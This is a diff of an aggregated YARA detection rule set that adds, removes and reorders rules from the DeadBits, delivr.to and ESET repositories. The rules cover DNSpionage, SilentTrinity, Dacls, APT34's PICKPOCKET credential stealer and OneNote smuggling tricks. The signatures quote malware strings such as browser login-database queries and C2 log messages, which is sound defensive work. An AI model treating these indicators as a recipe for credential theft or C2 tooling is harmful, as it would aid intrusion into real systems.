+		score = 75
+		quality = 78
+		tags = "APT, DNSCHANGER, FILE"
+		Description = "Attempts to detect DNSpionage PE samples"
+		Author = "Adam M. Swanda"
+
+	strings:
+		$x00 = "/Loginnn?id=" fullword ascii
+		$hdr0 = "Content-Disposition: fo" fullword ascii
+		$hdr1 = "Content-Type: multi" fullword ascii
+		$ua0 = "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36" fullword ascii
+		$ua1 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246" fullword ascii
+		$str0 = "send command result error! status code is: " fullword ascii
+		$str1 = "uploading command result form" fullword ascii
+		$str2 = "log.txt" fullword ascii
+		$str3 = "http host not found in config!" fullword ascii
+		$str4 = "send command result" fullword ascii
+		$str5 = "download error. status code: " fullword ascii
+		$str6 = "get command with dns" fullword ascii
+		$str7 = "dns host not found in config!" fullword ascii
+		$str8 = "command result is: " fullword ascii
+		$str9 = "command result size: " fullword ascii
+		$str10 = "connection type not found in config!" fullword ascii
+		$str11 = "commands: " fullword ascii
+		$str12 = "command is: " fullword ascii
+		$str13 = "port not found in config!" fullword ascii
+		$str14 = "download filename not found! " fullword ascii
+		$str15 = "base64 key not found in config!" fullword ascii
+		$str16 = "download filename is: " fullword ascii
+		$str17 = "config json is not valid" fullword ascii
+		$str18 = "config file will be changed from server!" fullword ascii
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( ( 5 of ( $str* ) ) or ( $x00 and ( 1 of ( $hdr* ) ) and 1 of ( $ua* ) ) )
+}
+rule DEADBITS_Silenttrinity : FILE
+{
+	meta:
+		description = "No description has been set in the source file - DeadBits"
+		author = "Adam Swanda"
+		id = "40f9174c-e9a5-5453-b5fa-6c01c46daffa"
 		date = "2019-07-19"
 		modified = "2019-07-19"
 		reference = "https://countercept.com/blog/hunting-for-silenttrinity/"
-		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/SilentTrinity_Delivery.yara#L1-L30"
+		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/SilentTrinity_Payload.yara#L1-L55"
 		license_url = "N/A"
-		logic_hash = "1efaa317dd250fa127b134ff8e6e6ac48d1056059256f790925d2315a6865033"
+		logic_hash = "7fd1775aadfccfdf141c0721f557e6c54b058ac17a59a8e4561dd62ab4a1eff3"
+		score = 75
+		quality = 78
+		tags = "FILE"
+		Description = "Attempts to detect the SilentTrinity malware family"
+		Author = "Adam M. Swanda"
+
+	strings:
+		$pdb01 = "SILENTTRINITY.pdb" ascii
+		$str01 = "Found {0} in zip" ascii fullword
+		$str02 = "{0} not in zip file" ascii fullword
+		$str03 = "Invalid HMAC: {0}" ascii fullword
+		$str04 = "Attempting HTTP GET to {0}" ascii fullword
+		$str05 = "Downloaded {0} bytes" ascii fullword
+		$str06 = "Error downloading {0}: {1}" ascii fullword
+		$str07 = "Attempting HTTP POST to {0}" ascii fullword
+		$str08 = "POST" ascii fullword
+		$str09 = "application/octet-stream" ascii fullword
+		$str10 = "Error sending job results to {0}: {1}" ascii fullword
+		$str11 = ".dll" ascii fullword
+		$str12 = "Trying to resolve assemblies by staging zip" ascii fullword
+		$str13 = "'{0}' loaded" ascii fullword
+		$str14 = "Usage: SILENTTRINITY.exe <URL> [<STAGE_URL>]" ascii fullword
+		$str15 = "IronPython.dll" ascii fullword
+		$str16 = "IronPythonDLL" ascii fullword
+		$str17 = "DEBUG" ascii fullword
+		$str18 = "Main.py" ascii fullword
+		$str19 = "Execute" ascii fullword
+		$str20 = "SILENTTRINITY.Properties.Resources" ascii fullword
+		$str21 = ".zip" ascii fullword
+		$a00 = "HttpGet" ascii fullword
+		$a01 = "System.Net" ascii fullword
+		$a02 = "Target" ascii fullword
+		$a03 = "WebClient" ascii fullword
+		$a04 = "get_Current" ascii fullword
+		$a05 = "Endpoint" ascii fullword
+		$a06 = "AesDecrypt" ascii fullword
+		$a07 = "AesEncrypt" ascii fullword
+		$a08 = "cert" ascii fullword
+		$a09 = "WebRequest" ascii fullword
+		$a10 = "HttpPost" ascii fullword
+
+	condition:
+		uint16( 0 ) == 0x5a4d and ( ( 8 of ( $str* ) or ( all of ( $a* ) and $pdb01 ) or $pdb01 ) )
+}
+rule DEADBITS_Dacls_Trojan_Windows : FILE
+{
+	meta:
+		description = "No description has been set in the source file - DeadBits"
+		author = "Adam Swanda"
+		id = "424b2c0d-2373-5a72-9a97-52b4bfc5cdcf"
+		date = "2020-01-07"
+		modified = "2020-01-07"
+		reference = "https://github.com/deadbits/yara-rules"
+		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/Dacls_Windows.yara#L1-L30"
+		license_url = "N/A"
+		logic_hash = "b77df7e3be9c264d6a63d40dbf49c41e9dd55b4e570c063b5710b849c36cc166"
 		score = 75
 		quality = 80
 		tags = "FILE"
-		Description = "Attempts to detect SilentTrinity delivery documents"
 		Author = "Adam M. Swanda"
 
 	strings:
-		$s0 = "VBE7.DLL" fullword ascii
-		$s1 = "TargetPivotTable" fullword ascii
-		$s2 = "DocumentUserPassword" fullword wide
-		$s3 = "DocumentOwnerPassword" fullword wide
-		$s4 = "Scripting.FileSystemObject" fullword wide
-		$s5 = "MSXML2.ServerXMLHTTP" fullword wide
-		$s6 = "Win32_ProcessStartup " fullword ascii
-		$s7 = "Step 3: Start looping through all worksheets" fullword ascii
-		$s8 = "Step 2: Start looping through all worksheets" fullword ascii
-		$s9 = "Stringer" fullword wide
-		$s10 = "-decode -f" fullword wide
-		$s11 = "2. Da biste pogledali dokument, molimo kliknite \"OMOGU" fullword wide
+		$fext00 = ".exe" ascii wide
+		$fext01 = ".cmd" ascii wide
+		$fext02 = ".bat" ascii wide
+		$fext03 = ".com" ascii wide
+		$str00 = "Software\\mthjk" ascii wide
+		$str01 = "WindowsNT.dll" ascii fullword
+		$str02 = "GET %s HTTP/1.1" ascii fullword
+		$str03 = "content-length:" ascii fullword
+		$str04 = "Connection: keep-alive" ascii fullword
+		$cls00 = "c_2910.cls" ascii fullword
+		$cls01 = "k_3872.cls" ascii fullword
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and filesize < 200KB and ( 8 of ( $s* ) or all of them )
+		( uint16( 0 ) == 0x5a4d ) and ( ( all of ( $cls* ) ) or ( all of ( $fext* ) and all of ( $str* ) ) )
 }
-rule DEADBITS_APT34_PICKPOCKET : APT APT34 INFOSTEALER WINMALWARE FILE
+rule DEADBITS_Dacls_Trojan_Linux
 {
 	meta:
-		description = "Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018"
+		description = "No description has been set in the source file - DeadBits"
 		author = "Adam Swanda"
-		id = "71db5c74-4964-5c5e-a830-242bfd0a2158"
-		date = "2019-07-22"
-		modified = "2019-07-22"
-		reference = "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html"
-		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/APT34_PICKPOCKET.yara#L1-L30"
+		id = "bb83ba2b-70a3-5a0f-9588-d93b7f07f67f"
+		date = "2020-01-07"
+		modified = "2020-01-07"
+		reference = "https://github.com/deadbits/yara-rules"
+		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/Dacls_Linux.yara#L1-L32"
 		license_url = "N/A"
-		logic_hash = "7063cff3eb42c4468e01c9b214161cd306f7126f66650d99d43168730d1dc83a"
+		logic_hash = "752d7daf9178e4fa20f2ce781c6ff70f83758f01479696f0808e1588da9a3d78"
 		score = 75
 		quality = 80
-		tags = "APT, APT34, INFOSTEALER, WINMALWARE, FILE"
+		tags = ""
+		Author = "Adam M. Swanda"
 
 	strings:
-		$s1 = "SELECT * FROM moz_logins;" ascii fullword
-		$s2 = "\\nss3.dll" ascii fullword
-		$s3 = "SELECT * FROM logins;" ascii fullword
-		$s4 = "| %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');" ascii fullword
-		$s5 = "\\Login Data" ascii fullword
-		$s6 = "%s\\Mozilla\\Firefox\\profiles.ini" ascii fullword
-		$s7 = "Login Data" ascii fullword
-		$s8 = "encryptedUsernamencryptedPasswor" ascii fullword
-		$s10 = "%s\\Mozilla\\Firefox\\%s" ascii fullword
-		$s11 = "encryptedUsername" ascii fullword
-		$s12 = "2013-12-06 14:53:30 27392118af4c38c5203a04b8013e1afdb1cebd0d" ascii fullword
-		$s13 = "27392118af4c38c5203a04b8013e1afdb1cebd0d" ascii
-		$s15 = "= 'table' AND name!='sqlite_sequence'   AND coalesce(rootpage,1)>0" ascii fullword
-		$s18 = "[*] FireFox :" fullword wide
-		$s19 = "[*] Chrome :" fullword wide
-		$s20 = "username_value" ascii fullword
+		$cls00 = "c_2910.cls" ascii fullword
+		$cls01 = "k_3872.cls" ascii fullword
+		$str00 = "{\"result\":\"ok\"}" ascii fullword
+		$str01 = "SCAN  %s  %d.%d.%d.%d %d" ascii fullword
+		$str02 = "/var/run/init.pid" ascii fullword
+		$str03 = "/flash/bin/mountd" ascii fullword
+		$str04 = "Name:" ascii fullword
+		$str05 = "Uid:" ascii fullword
+		$str06 = "Gid:" ascii fullword
+		$str08 = "PPid:" ascii fullword
+		$str09 = "session_id" ascii fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 8 of them or all of them )
+		uint32be( 0x0 ) == 0x7f454c46 and ( ( all of ( $cls* ) ) or ( all of ( $str* ) ) )
 }
 /*
  * YARA Rule Set
  * Repository Name: DelivrTo
  * Repository: https://github.com/delivr-to/detections
- * Retrieval Date: 2026-02-22
+ * Retrieval Date: 2026-03-01
  * Git Commit: f85e1d0c477cbf4689d1cfe4a80049c465673b23
  * Number of Rules: 12
  * Skipped: 0 (age), 3 (quality), 0 (score), 0 (importance)
@@ -70169,52 +70116,29 @@ rule DEADBITS_APT34_PICKPOCKET : APT APT34 INFOSTEALER WINMALWARE FILE
  *
  * NO LICENSE SET
  */
-rule DELIVRTO_SUSP_Onenote_Repeated_Filedatareference_Feb23 : FILE
+rule DELIVRTO_SUSP_Onenote_Win_Script_Encoding_Feb23 : FILE
 {
 	meta:
-		description = "Repeated references to files embedded in OneNote file. May indicate multiple copies of file hidden under image, as leveraged by Qakbot et al."
+		description = "Presence of Windows Script Encoding Header in a OneNote file with embedded files"
 		author = "delivr.to"
-		id = "2a46d6cc-2800-5645-889c-7ad7d7aa69bd"
-		date = "2023-02-17"
-		modified = "2023-02-17"
+		id = "95cd5ce0-07b3-5503-ad6f-944206bd4fb6"
+		date = "2023-02-19"
+		modified = "2023-02-19"
 		reference = "https://github.com/delivr-to/detections"
-		source_url = "https://github.com/delivr-to/detections/blob/f85e1d0c477cbf4689d1cfe4a80049c465673b23/yara-rules/onenote_repeated_files.yar#L1-L23"
+		source_url = "https://github.com/delivr-to/detections/blob/f85e1d0c477cbf4689d1cfe4a80049c465673b23/yara-rules/onenote_windows_script_encoding_file.yar#L1-L22"
 		license_url = "N/A"
-		logic_hash = "ef74a128de4d3745af856957931eaae0c0ae5a5583eab1a7c58d6dd666e7fd15"
+		logic_hash = "b7068f551b3665358f461a076c2d46c82db558d7fa4acb7d3c9c5c2afce31253"
 		score = 60
-		quality = 80
+		quality = 78
 		tags = "FILE"
 
 	strings:
 		$one = { E4 52 5C 7B 8C D8 A7 4D AE B1 53 78 D0 29 96 D3 }
 		$fdso = { 00 e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac }
-		$fref = { 3C 00 69 00 66 00 6E 00 64 00 66 00 3E 00 7B 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 2D 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 2D 00 ?? 00 ?? 00 ?? 00 ?? 00 2D 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? }
-
-	condition:
-		filesize < 5MB and ( $one at 0 ) and $fdso and #fref > ( #fdso * 4 )
-}
-rule DELIVRTO_SUSP_ZPAQ_Archive_Nov23 : FILE
-{
-	meta:
-		description = "ZPAQ file archive with expected file and block headers"
-		author = "delivr.to"
-		id = "28b6ffbe-be95-5ac8-ad3e-f9713a204d98"
-		date = "2023-11-26"
-		modified = "2023-11-27"
-		reference = "https://www.gdatasoftware.com/blog/2023/11/37822-agent-tesla-zpaq"
-		source_url = "https://github.com/delivr-to/detections/blob/f85e1d0c477cbf4689d1cfe4a80049c465673b23/yara-rules/zpaq_archives.yar#L1-L14"
-		license_url = "N/A"
-		logic_hash = "348144ee7137def00b37e074507e8148e51d34c484802a56bcd6e090d4628f18"
-		score = 40
-		quality = 55
-		tags = "FILE"
-
-	strings:
-		$fh = { 37 6B 53 74 A0 31 83 D3 8C B2 28 B0 D3 }
-		$block_header = /jDC\d{14}[cdhi]\d{10}/
+		$wse = { 23 40 7E 5E }
 
 	condition:
-		$fh at 0 and $block_header
+		filesize < 5MB and ( $one at 0 ) and $fdso and $wse
 }
 rule DELIVRTO_SUSP_NESTED_7ZIP_Feb25 : FILE
 {
@@ -70238,53 +70162,52 @@ rule DELIVRTO_SUSP_NESTED_7ZIP_Feb25 : FILE
 	condition:
 		$magic at 0 and #magic == 2
 }
-rule DELIVRTO_SUSP_SVG_Foreignobject_Nov24
+rule DELIVRTO_SUSP_ZPAQ_Archive_Nov23 : FILE
 {
 	meta:
-		description = "Presence of foreignObject in SVG file"
+		description = "ZPAQ file archive with expected file and block headers"
 		author = "delivr.to"
-		id = "148ef54a-4389-58c9-be89-c1714ef08371"
-		date = "2024-11-28"
-		modified = "2024-11-28"
-		reference = "https://github.com/delivr-to/detections"
-		source_url = "https://github.com/delivr-to/detections/blob/f85e1d0c477cbf4689d1cfe4a80049c465673b23/yara-rules/svg_foreignobject.yar#L1-L12"
+		id = "28b6ffbe-be95-5ac8-ad3e-f9713a204d98"
+		date = "2023-11-26"
+		modified = "2023-11-27"
+		reference = "https://www.gdatasoftware.com/blog/2023/11/37822-agent-tesla-zpaq"
+		source_url = "https://github.com/delivr-to/detections/blob/f85e1d0c477cbf4689d1cfe4a80049c465673b23/yara-rules/zpaq_archives.yar#L1-L14"
 		license_url = "N/A"
-		logic_hash = "51fdc105e826344b9e516a35178c37b6e4620781ee3a9ae64b9be181a13292e7"
+		logic_hash = "348144ee7137def00b37e074507e8148e51d34c484802a56bcd6e090d4628f18"
 		score = 40
-		quality = 51
-		tags = ""
+		quality = 80
+		tags = "FILE"
 
 	strings:
-		$svg = "svg" ascii wide nocase
-		$fo = "</foreignObject" ascii wide nocase
+		$fh = { 37 6B 53 74 A0 31 83 D3 8C B2 28 B0 D3 }
+		$block_header = /jDC\d{14}[cdhi]\d{10}/
 
 	condition:
-		all of them
+		$fh at 0 and $block_header
 }
-rule DELIVRTO_SUSP_PDF_MHT_Activemime_Sept23 : FILE
+rule DELIVRTO_SUSP_Onenote_RTLO_Character_Feb23 : FILE
 {
 	meta:
-		description = "Presence of MHT ActiveMime within PDF for polyglot file"
+		description = "Presence of RTLO Unicode Character in a OneNote file with embedded files"
 		author = "delivr.to"
-		id = "fbac1371-bad4-5751-a5c4-ce6c270fb83e"
-		date = "2023-09-04"
-		modified = "2023-09-04"
-		reference = "https://blogs.jpcert.or.jp/en/2023/08/maldocinpdf.html"
-		source_url = "https://github.com/delivr-to/detections/blob/f85e1d0c477cbf4689d1cfe4a80049c465673b23/yara-rules/pdf_mht_activemime.yar#L1-L19"
+		id = "03d86391-1392-5734-af5f-8a2c7b99167a"
+		date = "2023-02-17"
+		modified = "2023-02-17"
+		reference = "https://github.com/delivr-to/detections"
+		source_url = "https://github.com/delivr-to/detections/blob/f85e1d0c477cbf4689d1cfe4a80049c465673b23/yara-rules/onenote_rtlo_filename.yar#L1-L22"
 		license_url = "N/A"
-		logic_hash = "af1450f649de6daec242f11e3b3c35305d3127fac4ef719a4ddb4edab3ae3651"
-		score = 70
-		quality = 78
+		logic_hash = "286bc1ab1f5df0d64634f53cc82357187306c40b063b156f36b602e131262c7a"
+		score = 60
+		quality = 55
 		tags = "FILE"
 
 	strings:
-		$mht0 = "mime" ascii nocase
-		$mht1 = "content-location:" ascii nocase
-		$mht2 = "content-type:" ascii nocase
-		$act = "edit-time-data" ascii nocase
+		$one = { E4 52 5C 7B 8C D8 A7 4D AE B1 53 78 D0 29 96 D3 }
+		$fdso = { 00 e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac }
+		$rtlo = { 00 2E 20 }
 
 	condition:
-		uint32( 0 ) == 0x46445025 and all of ( $mht* ) and $act
+		filesize < 5MB and ( $one at 0 ) and $fdso and $rtlo
 }
 rule DELIVRTO_SUSP_CONCAT_ZIP_Nov24 : FILE
 {
@@ -70332,6 +70255,29 @@ rule DELIVRTO_SUSP_Archive_CVE_2025_6218_Jul25 : FILE
 	condition:
 		( uint32be( 0 ) == 0x52617221 or uint32( 0 ) == 0x04034b50 ) and filesize < 1024KB and any of ( $t* ) in ( 8 .. 504 ) and ( #t1 > 1 or #t2 > 1 )
 }
+rule DELIVRTO_SUSP_SVG_Foreignobject_Nov24
+{
+	meta:
+		description = "Presence of foreignObject in SVG file"
+		author = "delivr.to"
+		id = "148ef54a-4389-58c9-be89-c1714ef08371"
+		date = "2024-11-28"
+		modified = "2024-11-28"
+		reference = "https://github.com/delivr-to/detections"
+		source_url = "https://github.com/delivr-to/detections/blob/f85e1d0c477cbf4689d1cfe4a80049c465673b23/yara-rules/svg_foreignobject.yar#L1-L12"
+		license_url = "N/A"
+		logic_hash = "51fdc105e826344b9e516a35178c37b6e4620781ee3a9ae64b9be181a13292e7"
+		score = 40
+		quality = 51
+		tags = ""
+
+	strings:
+		$svg = "svg" ascii wide nocase
+		$fo = "</foreignObject" ascii wide nocase
+
+	condition:
+		all of them
+}
 rule DELIVRTO_SUSP_HTML_WASM_Smuggling
 {
 	meta:
@@ -70356,30 +70302,6 @@ rule DELIVRTO_SUSP_HTML_WASM_Smuggling
 	condition:
 		all of them
 }
-rule DELIVRTO_SUSP_Onenote_RTLO_Character_Feb23 : FILE
-{
-	meta:
-		description = "Presence of RTLO Unicode Character in a OneNote file with embedded files"
-		author = "delivr.to"
-		id = "03d86391-1392-5734-af5f-8a2c7b99167a"
-		date = "2023-02-17"
-		modified = "2023-02-17"
-		reference = "https://github.com/delivr-to/detections"
-		source_url = "https://github.com/delivr-to/detections/blob/f85e1d0c477cbf4689d1cfe4a80049c465673b23/yara-rules/onenote_rtlo_filename.yar#L1-L22"
-		license_url = "N/A"
-		logic_hash = "286bc1ab1f5df0d64634f53cc82357187306c40b063b156f36b602e131262c7a"
-		score = 60
-		quality = 55
-		tags = "FILE"
-
-	strings:
-		$one = { E4 52 5C 7B 8C D8 A7 4D AE B1 53 78 D0 29 96 D3 }
-		$fdso = { 00 e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac }
-		$rtlo = { 00 2E 20 }
-
-	condition:
-		filesize < 5MB and ( $one at 0 ) and $fdso and $rtlo
-}
 rule DELIVRTO_SUSP_ZIP_Smuggling_Jun01 : FILE
 {
 	meta:
@@ -70403,30 +70325,6 @@ rule DELIVRTO_SUSP_ZIP_Smuggling_Jun01 : FILE
 	condition:
 		uint32( 0 ) == 0x04034b50 and #lfh > 0 and #lfh <= 10 and #eocd == 1 and uint16( @lfh [ #lfh ] + 26 ) <= 256 and uint16( @lfh [ #lfh ] + 28 ) <= 256 and uint32( @lfh [ #lfh ] + 18 ) > 0 and uint32( @lfh [ #lfh ] + 18 ) < 100000000 and uint32( @eocd [ 1 ] + 16 ) > @lfh [ #lfh ] and ( uint32( @eocd [ 1 ] + 16 ) - ( @lfh [ #lfh ] + 30 + uint16( @lfh [ #lfh ] + 26 ) + uint16( @lfh [ #lfh ] + 28 ) + uint32( @lfh [ #lfh ] + 18 ) ) ) > 64
 }
-rule DELIVRTO_SUSP_Onenote_Win_Script_Encoding_Feb23 : FILE
-{
-	meta:
-		description = "Presence of Windows Script Encoding Header in a OneNote file with embedded files"
-		author = "delivr.to"
-		id = "95cd5ce0-07b3-5503-ad6f-944206bd4fb6"
-		date = "2023-02-19"
-		modified = "2023-02-19"
-		reference = "https://github.com/delivr-to/detections"
-		source_url = "https://github.com/delivr-to/detections/blob/f85e1d0c477cbf4689d1cfe4a80049c465673b23/yara-rules/onenote_windows_script_encoding_file.yar#L1-L22"
-		license_url = "N/A"
-		logic_hash = "b7068f551b3665358f461a076c2d46c82db558d7fa4acb7d3c9c5c2afce31253"
-		score = 60
-		quality = 78
-		tags = "FILE"
-
-	strings:
-		$one = { E4 52 5C 7B 8C D8 A7 4D AE B1 53 78 D0 29 96 D3 }
-		$fdso = { 00 e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac }
-		$wse = { 23 40 7E 5E }
-
-	condition:
-		filesize < 5MB and ( $one at 0 ) and $fdso and $wse
-}
 rule DELIVRTO_SUSP_Msg_CVE_2023_23397_Mar23 : CVE_2023_23397 FILE
 {
 	meta:
@@ -70450,11 +70348,60 @@ rule DELIVRTO_SUSP_Msg_CVE_2023_23397_Mar23 : CVE_2023_23397 FILE
 	condition:
 		uint32be( 0 ) == 0xD0CF11E0 and uint32be( 4 ) == 0xA1B11AE1 and $app and $rfp
 }
+rule DELIVRTO_SUSP_Onenote_Repeated_Filedatareference_Feb23 : FILE
+{
+	meta:
+		description = "Repeated references to files embedded in OneNote file. May indicate multiple copies of file hidden under image, as leveraged by Qakbot et al."
+		author = "delivr.to"
+		id = "2a46d6cc-2800-5645-889c-7ad7d7aa69bd"
+		date = "2023-02-17"
+		modified = "2023-02-17"
+		reference = "https://github.com/delivr-to/detections"
+		source_url = "https://github.com/delivr-to/detections/blob/f85e1d0c477cbf4689d1cfe4a80049c465673b23/yara-rules/onenote_repeated_files.yar#L1-L23"
+		license_url = "N/A"
+		logic_hash = "ef74a128de4d3745af856957931eaae0c0ae5a5583eab1a7c58d6dd666e7fd15"
+		score = 60
+		quality = 80
+		tags = "FILE"
+
+	strings:
+		$one = { E4 52 5C 7B 8C D8 A7 4D AE B1 53 78 D0 29 96 D3 }
+		$fdso = { 00 e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac }
+		$fref = { 3C 00 69 00 66 00 6E 00 64 00 66 00 3E 00 7B 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 2D 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 2D 00 ?? 00 ?? 00 ?? 00 ?? 00 2D 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? }
+
+	condition:
+		filesize < 5MB and ( $one at 0 ) and $fdso and #fref > ( #fdso * 4 )
+}
+rule DELIVRTO_SUSP_PDF_MHT_Activemime_Sept23 : FILE
+{
+	meta:
+		description = "Presence of MHT ActiveMime within PDF for polyglot file"
+		author = "delivr.to"
+		id = "fbac1371-bad4-5751-a5c4-ce6c270fb83e"
+		date = "2023-09-04"
+		modified = "2023-09-04"
+		reference = "https://blogs.jpcert.or.jp/en/2023/08/maldocinpdf.html"
+		source_url = "https://github.com/delivr-to/detections/blob/f85e1d0c477cbf4689d1cfe4a80049c465673b23/yara-rules/pdf_mht_activemime.yar#L1-L19"
+		license_url = "N/A"
+		logic_hash = "af1450f649de6daec242f11e3b3c35305d3127fac4ef719a4ddb4edab3ae3651"
+		score = 70
+		quality = 78
+		tags = "FILE"
+
+	strings:
+		$mht0 = "mime" ascii nocase
+		$mht1 = "content-location:" ascii nocase
+		$mht2 = "content-type:" ascii nocase
+		$act = "edit-time-data" ascii nocase
+
+	condition:
+		uint32( 0 ) == 0x46445025 and all of ( $mht* ) and $act
+}
 /*
  * YARA Rule Set
  * Repository Name: ESET
  * Repository: https://github.com/eset/malware-ioc
- * Retrieval Date: 2026-02-22
+ * Retrieval Date: 2026-03-01
  * Git Commit: 707f5b6899baf4e4911454e655a6428d9d3eeaa4
  * Number of Rules: 99
  * Skipped: 0 (age), 8 (quality), 1 (score), 0 (importance)
@@ -70487,6 +70434,121 @@ OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 
  */
+private rule ESET_Invisimole_Blob_PRIVATE
+{
+	meta:
+		description = "Detects InvisiMole blobs by magic values"
+		author = "ESET Research"
+		id = "6a179d91-50f1-5400-b141-0f162efd2431"
+		date = "2021-05-17"
+		modified = "2021-05-17"
+		reference = "https://github.com/eset/malware-ioc/"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/invisimole/invisimole.yar#L34-L52"
+		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
+		logic_hash = "8bddaf874da58fbe6362498f8979b511f39531fe2b98d4be8c099bdafb6d0067"
+		score = 75
+		quality = 80
+		tags = ""
+		license = "BSD 2-Clause"
+		version = "1"
+
+	strings:
+		$magic_old_32 = {F9 FF D0 DE}
+		$magic_old_64 = {64 FF D0 DE}
+		$magic_new_32 = {86 DA 11 CE}
+		$magic_new_64 = {64 DA 11 CE}
+
+	condition:
+		($magic_old_32 at 0 ) or ( $magic_old_64 at 0 ) or ( $magic_new_32 at 0 ) or ( $magic_new_64 at 0 )
+}
+
+private rule ESET_IIS_Native_Module_PRIVATE : FILE
+{
+	meta:
+		description = "Signature to match an IIS native module (clean or malicious)"
+		author = "ESET Research"
+		id = "e3bacdc8-fde1-5e83-ac94-79fc345e888d"
+		date = "2021-08-04"
+		modified = "2021-08-04"
+		reference = "https://github.com/eset/malware-ioc/"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/badiis/badiis.yar#L34-L92"
+		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
+		logic_hash = "5a388dc3253df606e2648d1f9c018e6dde373bbddce66dba69b7aecdd95bac18"
+		score = 75
+		quality = 55
+		tags = "FILE"
+		license = "BSD 2-Clause"
+		version = "1"
+
+	strings:
+		$e1 = "This module subscribed to event"
+		$e2 = "CHttpModule::OnBeginRequest"
+		$e3 = "CHttpModule::OnPostBeginRequest"
+		$e4 = "CHttpModule::OnAuthenticateRequest"
+		$e5 = "CHttpModule::OnPostAuthenticateRequest"
+		$e6 = "CHttpModule::OnAuthorizeRequest"
+		$e7 = "CHttpModule::OnPostAuthorizeRequest"
+		$e8 = "CHttpModule::OnResolveRequestCache"
+		$e9 = "CHttpModule::OnPostResolveRequestCache"
+		$e10 = "CHttpModule::OnMapRequestHandler"
+		$e11 = "CHttpModule::OnPostMapRequestHandler"
+		$e12 = "CHttpModule::OnAcquireRequestState"
+		$e13 = "CHttpModule::OnPostAcquireRequestState"
+		$e14 = "CHttpModule::OnPreExecuteRequestHandler"
+		$e15 = "CHttpModule::OnPostPreExecuteRequestHandler"
+		$e16 = "CHttpModule::OnExecuteRequestHandler"
+		$e17 = "CHttpModule::OnPostExecuteRequestHandler"
+		$e18 = "CHttpModule::OnReleaseRequestState"
+		$e19 = "CHttpModule::OnPostReleaseRequestState"
+		$e20 = "CHttpModule::OnUpdateRequestCache"
+		$e21 = "CHttpModule::OnPostUpdateRequestCache"
+		$e22 = "CHttpModule::OnLogRequest"
+		$e23 = "CHttpModule::OnPostLogRequest"
+		$e24 = "CHttpModule::OnEndRequest"
+		$e25 = "CHttpModule::OnPostEndRequest"
+		$e26 = "CHttpModule::OnSendResponse"
+		$e27 = "CHttpModule::OnMapPath"
+		$e28 = "CHttpModule::OnReadEntity"
+		$e29 = "CHttpModule::OnCustomRequestNotification"
+		$e30 = "CHttpModule::OnAsyncCompletion"
+		$e31 = "CGlobalModule::OnGlobalStopListening"
+		$e32 = "CGlobalModule::OnGlobalCacheCleanup"
+		$e33 = "CGlobalModule::OnGlobalCacheOperation"
+		$e34 = "CGlobalModule::OnGlobalHealthCheck"
+		$e35 = "CGlobalModule::OnGlobalConfigurationChange"
+		$e36 = "CGlobalModule::OnGlobalFileChange"
+		$e37 = "CGlobalModule::OnGlobalApplicationStart"
+		$e38 = "CGlobalModule::OnGlobalApplicationResolveModules"
+		$e39 = "CGlobalModule::OnGlobalApplicationStop"
+		$e40 = "CGlobalModule::OnGlobalRSCAQuery"
+		$e41 = "CGlobalModule::OnGlobalTraceEvent"
+		$e42 = "CGlobalModule::OnGlobalCustomNotification"
+		$e43 = "CGlobalModule::OnGlobalThreadCleanup"
+		$e44 = "CGlobalModule::OnGlobalApplicationPreload"
+
+	condition:
+		uint16( 0 ) == 0x5A4D and pe.exports ( "RegisterModule" ) and any of ( $e* )
+}
+
+private rule ESET_Not_Ms_PRIVATE
+{
+	meta:
+		description = "No description has been set in the source file - ESET"
+		author = "ESET TI"
+		id = "7edb96a1-a63a-580e-ac26-66fa14ae97d1"
+		date = "2018-08-22"
+		modified = "2018-09-05"
+		reference = "https://github.com/eset/malware-ioc"
